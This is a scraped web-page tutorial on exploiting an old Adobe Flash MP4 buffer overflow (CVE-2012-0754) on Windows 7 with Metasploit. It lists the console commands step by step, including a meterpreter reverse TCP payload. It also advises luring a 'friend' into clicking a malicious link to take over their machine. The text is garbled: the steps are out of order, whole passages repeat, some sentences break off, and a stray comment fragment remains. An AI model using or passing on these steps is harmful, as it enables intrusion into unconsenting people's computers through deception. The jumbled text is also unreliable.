How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7
When we click on the "exploit" tab at the top of the page, it takes us to a link to the exploit. We can then download or copy and paste that exploit for use.
Step 3: Use Metasploit
Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash
Player vulnerabilities. Search for "flash" using the following command.
• msf > search flash
When I do so, I find numerous flash exploits, but I have highlighted the one we are using here and it corresponds to CVE-2012-0754. Now let's use it.
• msf > use exploit/windows/browser/adobe_flash_mp4_cprt
When we do that, it will load the exploit into the console. Now let's get more info on it.
• msf > info
Metasploit returns for us some basic info on the exploit. I have highlighted the description in the screenshot above. In this info, we can also see that this exploit has 'targets". To get the most reliable results, you want to set the target.
In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.
• msf > set target 6
Step 4: Set Options
Next we need to set our options. We can see the options by typing:
• msf > show options
We need to set the SVRHOST and the payload at a minimum. We could also set the
SVRPORT, the URIPATH, and the SSL settings, but we will leave these at their
defaults here.
• msf > set SVRHOST 192.168.1.104
• msf > set payload windows/meterpreter/reverse_tcp
Once we set the payload, we once again need to check options as payloads have
their own set of options. When we do so, we see that we need to set the LHOST (the
IP of our local host) for the meterpreter.
• msf > set LHOST 192.168.1.104
Step 5: Exploit!
With all the parameters we need set, all we need to do type:
• msf> exploit
This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they
click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on www.example.com"
When they click on it, Metasploit will send the .mp4 file to their browser creating a buffer overflow as seen below.
With a bit of luck (this exploit doesn't work 100% of the time, more like 50%), you will
be rewarded with the meterpreter prompt and you will own his or her system!
Hacking into modern operating systems is becoming more and more difficult asMicrosoft and other software vendors become more security focused. The vigilant hacker can ALWAYS find a way in, if they are persistent and creative.
Step 1: Search Vulnerabilities
When we go to www.securityfocus.com and search the database for Adobe and then
Flash Player, we get 8 pages of vulnerabilities with 20 vulnerabilities per page. Its
obvious from this listing that Flash is riven with security problems. We could could
spend weeks going through all the Adobe Flash Player vulnerabilities , but I'll leave
that for you to do.
If you are looking to attack a client machine on a network, you would be well-served
to spend your time focused on Adobe Flash. There are so many vulnerabilities and
new ones arrive daily!
Step 2: Pick One
Let's take a look at one vulnerability known as CVE-2012-0754, a remote memory corruption. It was found in the wild back in February 2012 and involves using a corrupted .mp4 file to create a buffer overflow in Flash that enables the attacker to
execute their own code. Note that it works for Adobe Flash Player through 11.1.
Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash
Player vulnerabilities. Search for "flash" using the following command.
• msf > search flash
• msf > use exploit/windows/browser/adobe_flash_mp4_cprt
When we do that, it will load the exploit into the console. Now let's get more info on it.
• msf > info
In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.
• msf > set target 6
Next we need to set our options. We can see the options by typing:
• msf > show options
We need to set the SVRHOST and the payload at a minimum. We could also set the
SVRPORT, the URIPATH, and the SSL settings, but we will leave these at their
defaults here.
• msf > set SVRHOST 192.168.1.104
• msf > set payload windows/meterpreter/reverse_tcp
their own set of options. When we do so, we see that we need to set the LHOST (the
IP of our local host) for the meterpreter.
• msf > set LHOST 192.168.1.104
Step 5: Exploit!
With all the parameters we need set, all we need to do type:
• msf> exploit
This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they
click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on www.example.com"
When they click on it, Metasploit will send the .mp4 file to their browser creating a buffer overflow as seen below.
be rewarded with the meterpreter prompt and you will own his or her system!
We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
ReplyDelete